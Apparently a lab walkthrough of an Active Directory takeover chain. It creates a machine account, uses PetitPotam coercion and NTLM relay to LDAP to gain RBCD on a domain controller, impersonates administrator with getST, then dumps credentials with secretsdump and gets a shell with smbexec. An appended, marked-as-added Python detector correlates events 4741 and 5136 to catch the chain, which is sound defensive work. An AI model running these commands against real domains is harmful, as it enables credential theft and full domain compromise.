View the primary domain controller (PDC): netdom query pdc

List all domain controllers, including the primary (PDC) and additional (ADC) domain controllers: nltest /dclist:<domain name>

Test environment
Primary DC: 192.168.214.200
Additional DC: 192.168.214.201

Create a machine account

addcomputer.py -computer-name "relay1" -computer-pass "Aa@123" -dc-ip 192.168.214.200 "ust4.fun/testacc:Cxk@123" -method SAMR -debug

[*] Successfully added machine account relay1$ with password Aa@123
Start the relay listener

python3 ntlmrelayx.py --escalate-user relay1$ --delegate-access -smb2support --remove-mic -t ldap://192.168.214.201 -debug

python3 PetitPotam.py -d '' -u '' -p '' 192.168.214.147 192.168.214.200

Privilege escalation succeeded: relay1$ was granted RBCD on DC01.

Request a service ticket

python getST.py -spn cifs/DC01.ust4.fun ust4.fun/relay1$:Aa@123 -impersonate administrator -dc-ip 192.168.214.200

Import the ticket and obtain access

export KRB5CCNAME=administrator.ccache
python secretsdump.py -target-ip 192.168.214.200 -dc-ip 192.168.214.200 -k -no-pass @'dc01.ust4.fun' -just-dc-user administrator

export KRB5CCNAME=administrator.ccache
python smbexec.py -target-ip 192.168.214.200 -dc-ip 192.168.214.200 -k -no-pass @'dc01.ust4.fun'
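From the defender's side, the chain above leaves two audit artefacts on the domain controller: a computer account created by a plain domain user (event 4741, the SAMR add) followed shortly by a write to msDS-AllowedToActOnBehalfOfOtherIdentity on a DC computer object (event 5136, the relayed LDAP write). The detector below is an added example, not part of the original post; it assumes Directory Service Changes auditing is enabled, that events have already been parsed into simplified dicts (the records here are constructed, with names mirroring the walkthrough), and that the RBCD security descriptor has been decoded into the list of grantee SIDs.

```python
# Added example (not from the original post): correlate 4741 + 5136 to spot
# an NTLM-relay RBCD chain. Event records are CONSTRUCTED, simplified dicts.
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

SAMPLE_EVENTS = [  # constructed sample; names mirror the walkthrough
    {"id": 4741, "time": "2024-01-01T10:00:00", "subject": "testacc",
     "target": "relay1$", "target_sid": "S-1-5-21-1-1-1-1105"},
    {"id": 5136, "time": "2024-01-01T10:01:30", "subject": "DC01$",
     "object": "CN=DC01,OU=Domain Controllers,DC=ust4,DC=fun",
     "attribute": RBCD_ATTR, "value_sids": ["S-1-5-21-1-1-1-1105"]},
    {"id": 5136, "time": "2024-01-01T11:00:00", "subject": "svc_deploy",
     "object": "CN=WEB01,OU=Servers,DC=ust4,DC=fun",
     "attribute": "description", "value_sids": []},
]


def _ts(s):
    return datetime.fromisoformat(s)


def find_rbcd_relay_chain(events, window=timedelta(minutes=30)):
    """Return alerts for an RBCD write on a Domain Controllers object whose
    grantee SID belongs to a computer account created within `window`
    by a non-machine (plain user) account."""
    created = {e["target_sid"]: e for e in events
               if e["id"] == 4741 and not e["subject"].endswith("$")}
    alerts = []
    for e in events:
        if e["id"] != 5136 or e["attribute"] != RBCD_ATTR:
            continue
        if "OU=Domain Controllers" not in e["object"]:
            continue  # RBCD on a DC object is the high-value case
        for sid in e["value_sids"]:
            c = created.get(sid)
            if c and _ts(c["time"]) <= _ts(e["time"]) <= _ts(c["time"]) + window:
                alerts.append({"new_account": c["target"],
                               "created_by": c["subject"],
                               "dc_object": e["object"],
                               "written_by": e["subject"]})
    return alerts


if __name__ == "__main__":
    for a in find_rbcd_relay_chain(SAMPLE_EVENTS):
        print("ALERT possible NTLM-relay RBCD chain:", a)
```

A 5136 whose subject is the DC's own machine account (DC01$ writing its own object) is the tell-tale of relayed coerced authentication rather than an administrator's deliberate delegation change.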
